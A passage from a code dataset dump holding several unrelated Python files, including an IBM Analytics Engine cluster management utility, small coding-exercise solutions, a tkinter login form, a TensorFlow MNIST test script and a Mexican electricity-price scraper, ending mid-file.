\"spark.dynamicAllocation.maxExecutors\": \"10\",\n \"spark.dynamicAllocation.cachedExecutorIdleTimeout\": \"900\",\n \"spark.dynamicAllocation.executorIdleTimeout\": \"300\",\n \"spark.executor.instances\" : \"1\",\n \"spark.executor.cores\": \"1\",\n \"spark.executor.memory\": \"4G\",\n \"spark.driver.cores\": \"1\",\n \"spark.driver.memory\": \"4G\",\n \"spark.python.profile\": False\n }\n }\n }\n }\n }\n \n globals()['CLUSTER_CUSTOMIZATION_TEMPLATE'] ={\n \"target\": \"all\",\n \"custom_actions\": [{\n \"name\":\"install_customization\",\n \"script\":{\n \"source_type\": \"https\",\n \"source_props\": {\n \"base_url\":\"https://github.ibm.com/api/v3\",\n \"org\": \"\",\n \"token\": \"\",\n \"user\":\"\"\n },\n \"script_path\": \"\"\n },\n \"script_params\": [\"\"]\n }]\n }\n \n return\n\ndef printLog(*msgs): \n print(datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\") , ' '.join(map(str, msgs)) )\n\n@retry(stop_max_attempt_number=5, wait_fixed=60000)\ndef get_iam_token(api_key):\n printLog(\"Get IAM Auth token\")\n headers = {\"Content-type\": \"application/x-www-form-urlencoded\",\"Authorization\": \"Basic Yng6Yng=\"}\n data = \"apikey={}&grant_type=urn%3Aibm%3Aparams%3Aoauth%3Agrant-type%3Aapikey\".format(api_key)\n response=requests.post(IAM_AUTH_PATH, headers=headers, data=data)\n iam_token=response.json()['access_token']\n return iam_token\n\n@retry(stop_max_attempt_number=5, wait_fixed=60000)\ndef get_iae_instance_id(name, iam_token):\n printLog(\"Get instance id for\", name)\n headers = {\"Authorization\": \"Bearer {}\".format(iam_token)}\n url = \"{}/resource_instances\".format(RESOURCE_CONTROLLER_PATH_V1)\n response=requests.get(url, headers=headers)\n resources=response.json()['resources']\n instance_id=None\n for resource in resources:\n if resource['name'] == name:\n instance_id=resource['guid']\n break\n return instance_id\n\n@retry(stop_max_attempt_number=5, wait_fixed=60000)\ndef get_resource_group_id(api_key, group_name):\n printLog(\"Get resource group id for\", group_name)\n iam_token = get_iam_token(api_key)\n headers = {\"Authorization\": \"Bearer {}\".format(iam_token)}\n url = \"{}/resource_groups\".format(RESOURCE_CONTROLLER_PATH_V1)\n response=requests.get(url, headers=headers)\n resources=response.json()['resources']\n resource_group_id=None\n for resource in resources:\n if resource['name'] == group_name:\n resource_group_id=resource['id']\n break\n return resource_group_id\n\n# gets the named project attributes and clusters with its credentials (including IAE passwords)\n# Currently, only way to get IAE password without changing it.\n# https://ibm-cloudplatform.slack.com/archives/C7DGE3CUV/p1559059138002600\n@retry(stop_max_attempt_number=5, wait_fixed=60000)\ndef get_studio_project_config(api_key, project_name):\n printLog(\"Get studio project config for\", project_name)\n iam_token=get_iam_token(api_key)\n headers = {\"Authorization\": \"Bearer {}\".format(iam_token),\"Content-Type\": \"application/json\"} \n url=\"{}/projects?name={}\".format(WDP_API_PATH, project_name)\n response=requests.get(url, headers=headers)\n return response.json()\n \n@retry(stop_max_attempt_number=5, wait_fixed=60000) \ndef get_customization_status(instance_id, request_id, iam_token):\n headers = {\"Authorization\": \"Bearer {}\".format(iam_token),\"Content-Type\": \"application/json\"}\n url=\"{}/{}/customization_requests/{}\".format(IAE_API_PATH, instance_id,request_id)\n response=requests.get(url, headers=headers)\n #printLog(response.text)\n return response.json()\n\ndef wait_for_customization_completion(instance_id, request_id, iam_token, wait_interval_sec=60):\n run_status='CustomizingCluster'\n printLog(\"Waiting for cluster customization to finish ..\")\n while run_status == 'CustomizingCluster':\n time.sleep(wait_interval_sec)\n response=get_customization_status(instance_id, request_id, iam_token)\n run_status=response['run_status'] \n if run_status == 'Failed':\n printLog(\"Error customizing cluster.\")\n raise Exception(response.text)\n printLog(\"Customization complete with status=\",run_status)\n return\n\n# Run a adhoc script downloaded from github to customize all the nodes in the cluster \n# https://cloud.ibm.com/docs/AnalyticsEngine?topic=AnalyticsEngine-cust-cluster&locale=en\ndef run_cluster_customization(bmx_api_key, iae_name, git_token, git_org, git_user, git_script_path, script_params):\n printLog(\"Start cluster customization for\",iae_name)\n iam_token=get_iam_token(bmx_api_key)\n instance_id=get_iae_instance_id(iae_name, iam_token)\n headers = {\"Authorization\": \"Bearer {}\".format(iam_token),\"Content-Type\": \"application/json\"}\n url=\"{}/{}/customization_requests\".format(IAE_API_PATH, instance_id)\n template=CLUSTER_CUSTOMIZATION_TEMPLATE\n template[\"custom_actions\"][0][\"script_params\"]=script_params.split()\n \n # add git token to the url\n if git_script_path.startswith(\"https://\"):\n git_script_path = git_script_path.replace(\"https://\", \"https://{}@\".format(git_token))\n else:\n git_script_path = \"{}@{}\".format(git_token, git_script_path)\n \n data = json.dumps(template)\\\n .replace(\"\",git_token)\\\n .replace(\"\",git_script_path)\\\n .replace(\"\",git_org)\\\n .replace(\"\",git_user)\n \n #printLog(url, headers, data)\n response=requests.post(url, headers=headers, data=data)\n printLog(response.text) \n if hasattr(response, 'json') and 'request_id' in response.json():\n request_id=response.json()['request_id']\n wait_for_customization_completion(instance_id, request_id, iam_token)\n else:\n printLog(\"Error customizing cluster.\")\n printLog(response.text)\n raise Exception(response.text)\n printLog(\"Cluster customization done.\")\n return\n\n\n@retry(stop_max_attempt_number=5, wait_fixed=60000)\ndef get_provision_status(instance_id, iam_token):\n headers = {\"Authorization\": \"Bearer {}\".format(iam_token),\"Content-Type\": \"application/json\"}\n url = \"{}/{}/state\".format(IAE_API_PATH, instance_id)\n response = requests.get(url, headers=headers)\n return response.json()\n\n# monitor and wait for povisioning to complete. Sleep 1min between status checks\ndef wait_for_provision_completion(instance_id, iam_token, wait_interval_sec=60):\n run_status='Preparing'\n printLog(\"Waiting for provisioning to complete...\")\n while run_status in ['Preparing','Inactive']:\n time.sleep(wait_interval_sec)\n response = get_provision_status(instance_id, iam_token)\n run_status = response['state']\n #printLog(response)\n if run_status == 'Failed':\n printLog(\"Error creating cluster.\")\n raise Exception(response.text)\n \n printLog(\"Provisioning complete with status=\", run_status)\n return\n\n#Start the provisioning and wait for it to complete\n# https://cloud.ibm.com/docs/AnalyticsEngine?topic=AnalyticsEngine-provisioning-IAE&locale=en\ndef run_cluster_provision(bmx_api_key, iae_name, resource_group_name, compute_node_count, hardware_config, iae_plan):\n printLog(\"Start cluster provisioning\", iae_name)\n if hardware_config not in HARDWARE_CONFIGS:\n raise Exception(\"Incorrect IAE hardware_config provided:{} .. Correct values{}\".format(hardware_config, HARDWARE_CONFIGS))\n if iae_plan not in IAE_RESOURCE_PLANS:\n raise Exception(\"Incorrect IAE iae_plan provided:{} .. Correct values{}\".format(iae_plan, list(IAE_RESOURCE_PLANS.keys())))\n \n resource_group_id = get_resource_group_id(bmx_api_key, resource_group_name)\n iam_token = get_iam_token(bmx_api_key)\n \n headers = {\"Authorization\": \"Bearer {}\".format(iam_token),\"Content-Type\": \"application/json\"}\n cluster_config = CLUSTER_PROVISION_TEMPLATE\n cluster_config['name'] = iae_name\n cluster_config['resource_plan_id'] = IAE_RESOURCE_PLANS[iae_plan]\n cluster_config['resource_group_id'] = resource_group_id\n cluster_config['parameters']['num_compute_nodes'] = compute_node_count\n cluster_config['parameters']['hardware_config'] = hardware_config\n data = json.dumps(cluster_config)\n #printLog(url, headers, data)\n url=\"{}/resource_instances\".format(RESOURCE_CONTROLLER_PATH_V1)\n response=requests.post(url, headers=headers, data=data)\n printLog(\"Cluster provisioning started... \")\n # if provisioning started, wait for completion\n if hasattr(response, 'json') and 'guid' in response.json():\n instance_id=response.json()['guid']\n wait_for_provision_completion(instance_id, iam_token)\n else:\n printLog(\"Error creating cluster.\")\n printLog(response.text)\n raise Exception(response.text)\n return\n\n#https://cloud.ibm.com/apidocs/resource-controller#delete-a-resource-key-by-id\ndef run_cluster_resource_keys_deletion(api_key, iae_name):\n printLog(\"Delete resource keys for \", iae_name)\n iam_token=get_iam_token(api_key)\n instance_id=get_iae_instance_id(iae_name, iam_token)\n if not instance_id:\n raise Exception(\"Cluster deletion failed. No such cluster.\")\n headers = {\"Authorization\": \"Bearer {}\".format(iam_token),\"Content-Type\": \"application/json\"}\n url=\"{}/resource_instances/{}/resource_keys\".format(RESOURCE_CONTROLLER_PATH_V2, instance_id)\n response=requests.get(url, headers=headers).json()\n for resource in response['resources']:\n key = resource['guid'] \n url=\"{}/resource_keys/{}\".format(RESOURCE_CONTROLLER_PATH_V2, key)\n requests.delete(url, headers=headers)\n return\n\n# https://cloud.ibm.com/docs/services/AnalyticsEngine?topic=AnalyticsEngine-delete-service#resource-controller-rest-api\n@retry(stop_max_attempt_number=5, wait_fixed=60000)\ndef run_cluster_deletion(bmx_api_key, iae_name):\n run_cluster_resource_keys_deletion(bmx_api_key, iae_name) # New IAE, delete resource keys first\n printLog(\"Delete cluster\", iae_name)\n iam_token=get_iam_token(bmx_api_key)\n instance_id=get_iae_instance_id(iae_name, iam_token)\n if not instance_id:\n raise Exception(\"Cluster deletion failed. No such cluster.\")\n headers = {\"Authorization\": \"Bearer {}\".format(iam_token),\"Content-Type\": \"application/json\"}\n url=\"{}/resource_instances/{}\".format(RESOURCE_CONTROLLER_PATH_V2, instance_id)\n requests.delete(url, headers=headers)\n return\n\n# https://ibm-cloudplatform.slack.com/archives/C7DGE3CUV/p1559059138002600\n# https://www.ibm.com/blogs/bluemix/2019/02/ibm-analytics-engine-changes-to-cluster-credential-access/\n# New IAE clusters no longer store passwords. Reset Password API shud be called at cluster creation to\n# get the password and shud be stored for downstream API calls. \n# This is only way to get passwords unless the cluster has already been \n# added to Watson Studio, in which case, use get_studio_project_config() to get password.\n@retry(stop_max_attempt_number=15, wait_fixed=60000)\ndef get_cluster_credentials(api_key, iae_name):\n printLog(\"Get cluster credentials for\", iae_name)\n iam_token=get_iam_token(api_key)\n instance_id = get_iae_instance_id(iae_name, iam_token)\n if not instance_id:\n raise Exception(\"Unable to obtain cluster instance id.\")\n \n iae_credentials = {}\n \n # Get username/password\n headers = {\"Authorization\": \"Bearer {}\".format(iam_token),\"Content-Type\": \"application/json\"}\n url=\"{}/{}/reset_password\".format(IAE_API_PATH, instance_id)\n response=requests.post(url, headers=headers) \n if hasattr(response, 'json'):\n credentials=response.json()['user_credentials'] \n iae_credentials['username']=credentials['user']\n iae_credentials['password']=credentials['password']\n else:\n printLog(\"Unable to retrieve user/password.\")\n printLog(response.text)\n raise Exception('Unable to retrieve user/password')\n\n # Recent change in REST API for new IAE Cluster. First get source_crn for IAE, to get endpoints!!!\n headers = {\"Authorization\": \"Bearer {}\".format(iam_token),\"Content-Type\": \"application/json\"}\n url = '{}/resource_instances'.format(RESOURCE_CONTROLLER_PATH_V2)\n response=requests.get(url, headers=headers)\n source_crn = None\n for resource in response.json()['resources']:\n if resource['name'] == iae_name:\n source_crn = resource['crn']\n \n # Get service endpoints using the source crn\n headers = {\"Authorization\": \"Bearer {}\".format(iam_token),\"Content-Type\": \"application/json\"}\n data = {'name': iae_name, 'source_crn':source_crn}\n url = '{}/resource_keys'.format(RESOURCE_CONTROLLER_PATH_V1)\n response = requests.post(url, headers=headers, data= json.dumps(data))\n response = json.loads(re.sub('mn00.', 'mn003', response.text))# sometimes credentials return host with \"mn001\" which is never reachable\n if 'credentials' in response:\n iae_credentials['service_endpoints']= response['credentials']['cluster']['service_endpoints']\n else:\n printLog(\"Error getting cluster service credentials.\")\n printLog(response)\n raise Exception(response)\n \n return iae_credentials\n\n\n@retry(stop_max_attempt_number=5, wait_fixed=60000)\ndef get_spark_job_status(credentials, job_id):\n headers = {'Content-Type': 'application/json', 'X-Requested-By': 'livy'}\n url = \"{}/{}/state\".format(credentials['service_endpoints']['livy'], job_id)\n response = requests.get(url, headers=headers, auth=(credentials['username'], credentials['password']))\n printLog(\"job state:\", response.text)\n return response.json()['state']\n\n@retry(stop_max_attempt_number=5, wait_fixed=60000)\ndef get_spark_job_log(credentials, job_id):\n headers = {'Content-Type': 'application/json', 'X-Requested-By': 'livy'}\n url = \"{}/{}/log\".format(credentials['service_endpoints']['livy'], job_id)\n response = requests.get(url, headers=headers, auth=(credentials['username'], credentials['password']))\n return response.json()['log']\n \ndef wait_for_spark_job_completion(credentials, job_id, wait_interval_sec=60):\n printLog(\"Waiting for spark job completion for job_id=\",job_id)\n run_status=get_spark_job_status(credentials, job_id)\n while run_status in ['running','starting','idle']:\n time.sleep(wait_interval_sec)\n run_status = get_spark_job_status(credentials, job_id)\n printLog(\"Job complete with status=\",run_status)\n return run_status\n \n\n# Submit a spark job and wait for its completion\n# https://cloud.ibm.com/docs/services/AnalyticsEngine?topic=AnalyticsEngine-livy-api\n# https://github.com/cloudera/livy#rest-api\ndef run_spark_job_to_completion(credentials, job_config_path):\n printLog(\"Submit spark job\")\n # Submit job\n headers = {'Content-Type': 'application/json', 'X-Requested-By': 'livy'}\n url = credentials['service_endpoints']['livy'] \n with open(job_config_path) as json_file: \n data = json.load(json_file)\n\n response = requests.post(url, headers=headers, data=json.dumps(data), auth=(credentials['username'], credentials['password']))\n printLog(response.text)\n job_id = response.json()['id'] \n run_status = wait_for_spark_job_completion(credentials, job_id)\n log = get_spark_job_log(credentials, job_id)\n return log\n\n\ninit()\n","sub_path":"cluster-mgmt-utils/manage_iae_cluster_utils.py","file_name":"manage_iae_cluster_utils.py","file_ext":"py","file_size_in_byte":18548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"492659565","text":"#The included code stub will read an integer, n, from STDIN.\n#Without using any string methods, try to print the following:\n#123...n Exm: n=5 output: 12345\n\nn = int(input())\n\nif n >= 1 and n <= 150:\n\n for i in range(1,n+1):\n print(i,end=\"\")\n\n ","sub_path":"Print Function.py","file_name":"Print Function.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"539998455","text":"from tkinter import *\nfrom .GUI_baseUI import UI\n\n\nclass login_UI(UI):\n\n \"\"\"\n Login to Email UI\n \"\"\"\n\n\n def __init__(self, master, img):\n super().__init__(master, img)\n\n\n # ------------------MID FRAME ----------------------------------\n self.mid_frame.grid_columnconfigure(0, weight=1)\n self.mid_frame.grid_columnconfigure(3, weight=1)\n # self.mid_frame.config(background='green')\n\n\n self.mid_frame.grid_rowconfigure(1, weight=1)\n\n self.header_label = Label(self.mid_frame, text='Enter Email', font=(\"TkDefaultFont\", 12))\n self.header_label.grid(row=0, column=1, pady=10, columnspan=2)\n # self.model_list_frame.config(background='green')\n\n\n # #----------------ENTRY FRAME---------------------------------\n # makes boarders to center the input frame\n self.var = IntVar()\n self.var.set(0)\n\n self.account_frame = Frame(self.mid_frame)\n self.account_frame.grid(row=1, column=1, sticky='ns')\n # self.account_frame.config(background='red')\n self.account_frame.grid_rowconfigure(0, weight=1)\n self.account_frame.grid_rowconfigure(5, weight=1)\n\n self.account_label = Label(self.account_frame, text='Email :')\n self.account_entry = Entry(self.account_frame, width=30)\n self.pin_label = Label(self.account_frame, text='Password :')\n self.pin_entry = Entry(self.account_frame, width=30, show=\"*\")\n self.login_but = Button(self.account_frame, text='Login', width=10)\n\n self.account_label.grid(row=1, column=0, sticky=E, padx=5, pady=5)\n self.account_entry.grid(row=1, column=1, sticky=E, padx=5, pady=5)\n self.pin_label.grid(row=2, column=0, sticky=E, padx=5, pady=5)\n self.pin_entry.grid(row=2, column=1, sticky=E, padx=5, pady=5)\n self.login_but.grid(row=3, column=1, padx=30, pady=5)\n\n self.model_list_frame = Frame(self.mid_frame)\n self.model_list_frame.grid(row=1, column=2, sticky='nsew')\n\n # self.model_list_frame.grid_rowconfigure(0, weight=1)\n self.model_list_frame.grid_rowconfigure(2, weight=2)\n # self.model_list_frame.grid_rowconfigure(3, weight=1)\n\n\n self.model_list_label = Label(self.model_list_frame, text='Model List')\n self.model_list = Listbox(self.model_list_frame, width=30, selectmode='multiple')\n self.model_list_scrollbar = Scrollbar(self.model_list_frame, orient='vertical')\n self.model_list.config(yscrollcommand=self.model_list_scrollbar.set)\n self.model_list_scrollbar.config(command=self.model_list.yview)\n\n self.model_list_label.grid(row=1, padx=5)\n self.model_list.grid(row=2, pady=5, sticky='ns')\n self.model_list_scrollbar.grid(row=2, column=1, sticky='ns')\n\n # self.radio_but_new = Radiobutton(self.account_frame, text=\"New Scans\", variable=self.var, value=0, indicatoron=1)\n # self.radio_but_all = Radiobutton(self.account_frame, text=\"All Scans\", variable=self.var, value=1, indicatoron=1)\n # self.radio_but_new.select()\n\n # self.radio_but_all.grid(row=4, column=3, sticky=E, padx=5, pady=10)\n # self.radio_but_new.grid(row=4, column=4, sticky=E, padx=5, pady=10)\n\n\n # -------------Bottom FRAME ---------------------------------------------\n self.botbut_frame.grid_rowconfigure(0, weight=1)\n self.botbut_frame.grid_rowconfigure(2, weight=1)\n\n self.botbut_frame.grid_columnconfigure(1, weight=1)\n\n self.can_but = Button(self.botbut_frame, text='Cancel', width=10)\n self.can_but.grid(row=1, column=0, padx=30, pady=15)\n\n self.get_but = Button(self.botbut_frame, text='Get Scans', width=10)\n self.get_but.grid(row=1, column=2, padx=30, pady=15)\n\n\n\nif __name__ == \"__main__\":\n root = Tk()\n img = \"\"\n login_UI(root, img)\n mainloop()\n","sub_path":"view/GUI_login.py","file_name":"GUI_login.py","file_ext":"py","file_size_in_byte":3859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"146111235","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\n# ## Importation du modèle déjà entrainé\n\n# In[2]:\n\n\nsaver = tf.train.import_meta_graph(\"./models/my_model_final.ckpt.meta\")\n\n\n# In[3]:\n\n\nfor op in tf.get_default_graph().get_operations():\n print(op.name)\n\n\n\n# ## Utilisation du modèle\n\n# ### Importation des variables à utiliser\n\n# In[45]:\n\n\nX = tf.get_default_graph().get_tensor_by_name(\"X:0\")\n\nlogits = tf.get_default_graph().get_tensor_by_name(\"dnn/logits/BiasAdd:0\")\npredictions = tf.argmax(logits, 1)\n\n\n# ## Importation de la librairie et tranformation des fichiers png en mnist, puis évaluation de l'image\n\n# In[46]:\n\n\nimport png_to_mnist\n\n\n# In[56]:\n\n\ninit = tf.global_variables_initializer()\n\nsess = tf.InteractiveSession()\n \ninit.run()\n\nchoix = \"O\"\nwhile choix != \"n\":\n image = input(\"Veuillez entrer le lien de l'image .png :\" )\n\n image = np.array(png_to_mnist.imagePrepare(image))\n\n img = np.array([image])\n predicted_labels = predictions.eval(feed_dict={X: img})\n print(\"La valeur prédite est : \", predictions.eval(feed_dict={X: img}))\n\n plt.gray()\n plt.imshow(image.reshape([28, 28]))\n plt.show()\n\n \n \n choix = input(\"Voulez-vous faire un autre test ? (O/n) \")\n print(\"\\n\\n\\n\")\n \n\n\n# In[ ]:\n\n\n\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"358569571","text":"# amazon OA\n\nclass Solution:\n def reorderLogFiles(self, logs):\n letter_logs = filter(lambda x: x[-1] >= \"a\" and x[-1] <= \"z\", logs)\n digit_logs = filter(lambda x: x[-1] >= \"0\" and x[-1] <= \"9\", logs)\n letter_logs = sorted(letter_logs, \n key = lambda x: (x.split(\" \", 1)[1], x.split(\" \", 1)[0]))\n letter_logs.extend(digit_logs)\n return letter_logs\n\n\nif __name__ == \"__main__\":\n x = [\"a1 9 2 3 1\",\"g1 act car\",\"zo4 4 7\",\"ab1 off key dog\",\"a8 act zoo\"]\n print(Solution().reorderLogFiles(x))\n\n","sub_path":"OA/OA_Amazon_reorder_log_files.py","file_name":"OA_Amazon_reorder_log_files.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"280215967","text":"\"\"\"Plot the distance between pairs of 2D points on a 2D grid in 3D.\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pylab\n\n\ndef plot_dist_map(x_test, y_test, y_prediction, name):\n \"\"\"Plot the distance between pairs of 2D points on a 2D grid in 3D.\n\n This module can be used to plot the (2 norm) distance between two points :math:`y, y' \\in \\mathbb{R}^2` for a given\n grid (:math:`\\subset \\mathbb{R}^2`) of pairs. Its aim is to visualize the prediction error of an model trained on a\n function :math:`f \\in \\mathbb{R}^2 \\\\rightarrow \\mathbb{R}^2` with input :math:`x \\in \\mathbb{R}^2` and output\n :math:`y' \\in \\mathbb{R}^2`.\n\n Args:\n x_test:\n (n,2)-array; list of all points ``x_test[i]`` :math:`\\in \\mathbb{R}^2` in the grid. (inputs for the MLP)\n y_test:\n (n,2)-array; list of all points ``y_test[i] = f(x_test[i])`` :math:`\\in \\mathbb{R}^2`, where ``f`` is the\n function on which the MLP was trained\n y_prediction:\n (n,2)-array; list of all points ``y_prediction[i]`` :math:`\\in \\mathbb{R}^2`, where ``y_prediction[i] is the\n prediction of the MLP trained on ``f`` for input ``x_test[i]``\n name:\n name of the function ``f`` on which the MLP was trained, used to name the file in which the visualization is\n saved.\n \"\"\"\n\n # reshape sample-points\n plot_dim_1 = [i[0] for i in x_test]\n plot_dim_2 = [i[1] for i in x_test]\n\n # calculate errors\n errors = [np.linalg.norm(y_test[i]-y_prediction[i]) for i in range(y_test.shape[0])]\n errors = np.array(errors)\n plot_dim_3 = errors\n\n # create and configure plot\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n colmap = pylab.cm.ScalarMappable(cmap=pylab.cm.coolwarm)\n colmap.set_array(plot_dim_3)\n ax.scatter(plot_dim_1, plot_dim_2, plot_dim_3, c=pylab.cm.coolwarm(plot_dim_3/max(plot_dim_3)), marker='o')\n fig.colorbar(colmap)\n ax.set_xlabel('X')\n ax.set_ylabel('Y')\n ax.set_zlabel('prediction error')\n plt.draw()\n # save plot\n # fig.savefig('plots/' + name + '_learned.png')\n # show plot\n plt.show()\n plt.clf()\n","sub_path":"regression/plot3d.py","file_name":"plot3d.py","file_ext":"py","file_size_in_byte":2184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"225901422","text":"# get content\nimport orbit_utils\nimport read_utils\nfrom orbit import Orbit\n\nstringlist = read_utils.getinput2(\"day6.txt\")\norbits = list()\nfor item in stringlist:\n items = item.strip().split(\")\")\n orbits.append(Orbit(items[0], items[1]))\n\ncount = orbit_utils.count_orbits(orbits)\nprint(\"Question 6A: Total orbits: \", count)\n\n# Question 6B\nsantaorbit = orbit_utils.find_orbiter(\"SAN\", orbits)\nsantapath = orbit_utils.find_path(santaorbit, orbits, list())\nyouorbit = orbit_utils.find_orbiter(\"YOU\", orbits)\nyoupath = orbit_utils.find_path(youorbit, orbits, list())\n\ncross_orbit = orbit_utils.find_crossing(santapath, youpath)\nsteps = youpath.index(cross_orbit) + santapath.index(cross_orbit)\n\nprint(\"Question 6B: Path from you to Santa: \", steps)\n","sub_path":"day6.py","file_name":"day6.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"641098136","text":"\"\"\"\nDefinition of TreeNode:\n\"\"\"\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left, self.right = None, None\n\nfrom queue import Queue\n\nclass Solution:\n \"\"\"\n @param root: A Tree\n @return: Level order a list of lists of integer\n \"\"\"\n def levelOrder(self, root):\n if root is None:\n return []\n\n q = Queue()\n q.put(root)\n\n result = []\n \n while not q.empty(): # 注意结束条件\n size = q.qsize()\n level = [] # level初始化\n for i in range(size):\n node = q.get()\n level.append(node.val)\n if node.left:\n q.put(node.left)\n if node.right:\n q.put(node.right)\n print(level)\n result.append(level)\n return result\n\nif __name__ == '__main__':\n node1 = TreeNode(1)\n node2 = TreeNode(2)\n node3 = TreeNode(3)\n node4 = TreeNode(4)\n node5 = TreeNode(5)\n node6 = TreeNode(6)\n node7 = TreeNode(7)\n node1.left = node2\n node1.right = node3\n node2.left = node4\n node2.right = node5\n node3.left = node6\n node3.right = node7\n root = node1\n print(Solution().levelOrder(root))\n","sub_path":"专题学习/BFS/BinaryTreeLevelOrderTraveral.py","file_name":"BinaryTreeLevelOrderTraveral.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"473763444","text":"### To Do's ###\n# - Preguntar donde almacenar consulta\n# Por default que se guarde en Desktop\n# Hacer una GUI para seleccionar más facil la info\n# auto generacion de reporte sobre rango de consulta\n\n\n# MODULOS\nimport datetime\nfrom datetime import timedelta\nimport pandas as pd\nimport re\n\n# -------------------------------\n\n# FUNCIONES\n\n\n# Convierte en lista el archivo con los nodos\ndef txt_to_list(archivo_txt):\n with open(archivo_txt) as archivo:\n lineas = archivo.readlines()\n lista_nodos = [linea.replace(\"\\n\", \"\") for linea in lineas]\n return lista_nodos\n\n#Esta función convierte el contenido JSON del URL en una Data Frame\ndef url_into_df(url):\n json = pd.read_json(url)[\"Resultados\"][0][\"Valores\"]\n data_frame = pd.DataFrame(json)\n return data_frame\n\n\n\n# ------------------------------------------------\n\n#Simplemente pide las fechas del plazo de la consulta\ndia_i = int(input(\"Dia inicio: \"))\nmes_i = int(input(\"Mes inicio: \"))\nanio_i = int(input(\"Año inicio: \"))\n\ndia_f = int(input(\"Dia fin: \"))\nmes_f = int(input(\"Mes fin: \"))\nanio_f = int(input(\"Año fin: \"))\n\n#Seleccionar el sistema, aunque escribas en minuscula, lo convierte en mayuscula\nwhile True:\n sistema = input(\"SIN BCA o BCS: \").upper()\n if sistema in (\"SIN\", \"BCA\", \"BCS\"):\n break\n else:\n continue\n\n#Seleccionar si es MDA o MTR\nwhile True:\n proceso = input(\"MDA o MTR: \").upper()\n if proceso in (\"MDA\", \"MTR\"):\n break\n else:\n continue\n\n#Selecciona si es nodo P o nodo Distribuido\nwhile True:\n tipo_nodo = input(\"Nodo P o D: \").upper()\n if tipo_nodo in (\"P\", \"D\"):\n break\n else:\n continue\n\nif tipo_nodo == \"D\":\n tipo_request = \"SWPEND\"\n\n while True:\n nodo = input(\"Introduce nombre nodo: \").upper().replace(\" \", \"-\")\n if nodo in txt_to_list(\"nodosD.txt\"):\n break\n else:\n print(\"Nombre de nodo equivocado, intenta de nuevo: \")\n continue\nelse:\n tipo_request = \"SWPML\"\n while True:\n nodo = input(\"Inserta NodoP: \").upper()\n if re.match(\"^[0-9]{2}[A-Z]{3}-[0-9]{3}$\", nodo):\n break\n else:\n print(\"El formato debe ser ##XXX-###\")\n continue\n\n# Plantilla de URL para las consultas\nurl_base = (\n \"https://ws01.cenace.gob.mx:8082/\"\n + tipo_request\n + \"/SIM/\"\n + sistema\n + \"/\"\n + proceso\n + \"/\"\n + nodo\n + \"/{}/{}/{}/{}/{}/{}/\"\n + \"JSON\"\n)\n\n# convierte en formato de fecha los valores ingresados en el inicio\nfecha_i = datetime.datetime(anio_i, mes_i, dia_i)\nfecha_f = datetime.datetime(anio_f, mes_f, dia_f)\n\n# regresa la cantidad de dias entre la fecha de inicio y la fecha final\nplazo = (fecha_f - fecha_i).days + 1\n\n# si el plazo es menor a una semana, solo hará 1 ronda (consulta minima es de 1 semana)\nif plazo < 7:\n rondas = 1\n # si el plazo es mayor a 7 días, se asignan rondas = al ultimo numero multiplo de 7 en el plazo\nelse:\n rondas = (plazo - plazo % 7) / 7\n\n # con eso cubres los dias que no entran en las rondas (si plazo = 31, rondas = 4, dias_restantes = 3)\ndias_restantes = plazo - rondas * 7\n\n# crea listas de \"inicio\" y \"fin\" de los rangos de busqueda\nlista_1, lista_2 = list(), list()\n\nfor i in range(0, int(rondas)):\n lista_1.append((fecha_i + timedelta(days=(7 * i))))\n lista_2.append((fecha_i + timedelta(days=(7 * i)) + timedelta(days=6)))\n\n# considera los \"dias restantes\" que quedan fuera del rango\nlista_3 = list()\nfor i in range(0, int(dias_restantes)):\n lista_3.append(fecha_i + timedelta(days=7 * rondas) + timedelta(days=i))\n\nlista_urls = list()\nfor i in range(0, int(rondas)):\n lista_urls.append(\n url_base.format(\n lista_1[i].year,\n f\"{lista_1[i].month:02}\",\n f\"{lista_1[i].day:02}\",\n lista_2[i].year,\n f\"{lista_2[i].month:02}\",\n f\"{lista_2[i].day:02}\",\n )\n )\n\nlista_urls.append(\n url_base.format(\n lista_3[0].year,\n f\"{lista_3[0].month:02}\",\n f\"{lista_3[0].day:02}\",\n lista_3[-1].year,\n f\"{lista_3[-1].month:02}\",\n f\"{lista_3[-1].day:02}\",\n )\n)\n\n#A un DataFrame vació le voy agregando los DataFrame de cada URL consultado\ndf = pd.DataFrame()\nfor urlz in lista_urls:\n df_nuevo = url_into_df(urlz)\n df = pd.concat((df, df_nuevo))\n\n\ndf.to_csv(\n \"{} {}.{}.{} - {}.{}.{}.csv\".format(\n nodo, anio_i, mes_i, dia_i, anio_f, mes_f, dia_f\n )\n)\n","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":4457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"276925110","text":"import numpy as np\nimport pandas as pd\n\ndf = pd.read_csv('iris.data', header=None)\nx = df.iloc[0:100,[0, 1, 2, 3]].values\ny = df.iloc[0:100,4].values\ny = np.where(y=='Iris-setosa', 0, 1)\n\n\n# 4-3-2 節:準備資料集\n\nx_train = np.empty((80, 4))\nx_test = np.empty((20, 4))\ny_train = np.empty(80)\ny_test = np.empty(20)\n\n\nx_train[:40],x_train[40:] = 